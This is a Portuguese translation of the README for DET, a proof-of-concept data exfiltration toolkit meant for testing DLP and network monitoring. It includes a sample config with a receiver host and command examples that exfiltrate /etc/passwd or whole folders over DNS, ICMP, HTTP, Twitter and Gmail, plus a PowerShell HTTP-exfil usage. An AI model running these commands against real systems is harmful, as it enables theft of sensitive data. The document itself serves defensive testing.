
(extensível) Data Exfiltration Toolkit (DET)
=======
DET (é fornecido COMO ESTÁ), é uma prova de conceito para realizar Exfiltração de Dados usando um ou vários canais ao mesmo tempo.
Esta é uma Prova de Conceito com o objetivo de identificar possíveis falhas de DLP. Isto nunca deve ser usado para exfiltrar dados sensíveis/em produção (por exemplo, numa avaliação)
A ideia foi criar um toolkit genérico para conectar qualquer tipo de protocolo/serviço para testar a configuração de soluções implementadas de Monitoramento de Rede e Prevenção de Vazamento de Dados (DLP), contra diferentes técnicas de exfiltração de dados.
O repositório principal foi movido para aqui.
DET foi apresentado no BSides Ljubljana no dia 9 de Março de 2016 e os slides estarão disponíveis aqui. Os slides estão disponíveis aqui.
Clone o repositório:
git clone https://github.com/sensepost/DET.git
Depois:
pip install -r requirements.txt --user
Para usar o DET, você precisará configurá-lo e adicionar suas próprias configurações (ex.: SMTP/IMAP, senha de criptografia AES256 e assim por diante). Um arquivo de exemplo de configuração foi fornecido e é chamado: config-sample.json
{
"plugins": {
"http": {
"target": "192.168.1.101",
"port": 8080
},
"google_docs": {
"target": "192.168.1.101",
"port": 8080,
},
"dns": {
"key": "google.com",
"target": "192.168.1.101",
"port": 53
},
"gmail": {
"username": "[email protected]",
"password": "ReallyStrongPassword",
"server": "smtp.gmail.com",
"port": 587
},
"tcp": {
"target": "192.168.1.101",
"port": 6969
},
"udp": {
"target": "192.168.1.101",
"port": 6969
},
"twitter": {
"username": "PaulWebSec",
"CONSUMER_TOKEN": "XXXXXXXXX",
"CONSUMER_SECRET": "XXXXXXXXX",
"ACCESS_TOKEN": "XXXXXXXXX",
"ACCESS_TOKEN_SECRET": "XXXXXXXXX"
},
"icmp": {
"target": "192.168.1.101"
}
},
"AES_KEY": "THISISACRAZYKEY",
"sleep_time": 10
}
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
[-L]
Data Exfiltration Toolkit (SensePost)
optional arguments:
-h, --help show this help message and exit
-c CONFIG Configuration file (eg. '-c ./config-sample.json')
-f FILE File to exfiltrate (eg. '-f /etc/passwd')
-d FOLDER Folder to exfiltrate (eg. '-d /etc/')
-p PLUGIN Plugins to use (eg. '-p dns,twitter')
-e EXCLUDE Plugins to exclude (eg. '-e gmail,icmp')
-L Server mode
Para carregar todos os plugins:
python det.py -L -c ./config.json
Para carregar apenas os módulos twitter e gmail:
python det.py -L -c ./config.json -p twitter,gmail
Para carregar todos os plugins e excluir DNS:
python det.py -L -c ./config.json -e dns
Para carregar todos os plugins:
python det.py -c ./config.json -f /etc/passwd
Para carregar apenas os módulos twitter e gmail:
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd
Para carregar todos os plugins e excluir DNS:
python det.py -c ./config.json -e dns -f /etc/passwd
E no PowerShell (módulo HTTP):
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'
Até agora, o DET suporta vários protocolos, listados aqui:
E outros "serviços":
Até agora, estou ocupado implementando novos módulos que estão quase prontos para lançamento, incluindo:
Algumas referências/creditos muito legais para pessoas que me inspiraram com seus projetos:
Você pode me encontrar no Twitter @PaulWebSec. Sinta-se à vontade se quiser contribuir, clonar, fazer fork, enviar seu PR e assim por diante.
DET está licenciado sob uma Licença MIT. Permissões além do escopo desta licença podem estar disponíveis em [email protected]